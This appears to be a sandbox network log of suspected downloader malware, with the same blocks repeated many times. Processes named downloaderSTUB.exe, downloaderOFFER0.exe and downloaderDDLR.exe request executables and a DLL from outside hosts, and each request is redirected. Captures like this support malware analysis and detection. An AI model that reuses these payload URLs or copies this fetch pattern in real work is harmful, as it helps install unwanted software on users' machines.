    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:56 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:56 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 79
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:56 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 79
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 79
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:56 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:57 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 80
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:57 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 80
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 80
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:00 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:57 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 80
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 83
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:57 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 80
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:57 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 80
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:58 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:58 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 81
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 81
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:01 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 81
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 81
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 81
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 84
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:01 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:01 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 85
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 85
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 85
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 85
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 85
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 85
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:04 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    GET
    http://openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    216.239.32.21:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: http://www.openbitcoin.org/static/dist/OpenCL.dll
    Date: Mon, 25 Dec 2023 11:01:13 GMT
    Content-Type: text/html; charset=UTF-8
    Server: ghs
    Content-Length: 246
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • flag-us
    GET
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.directdownloader.com
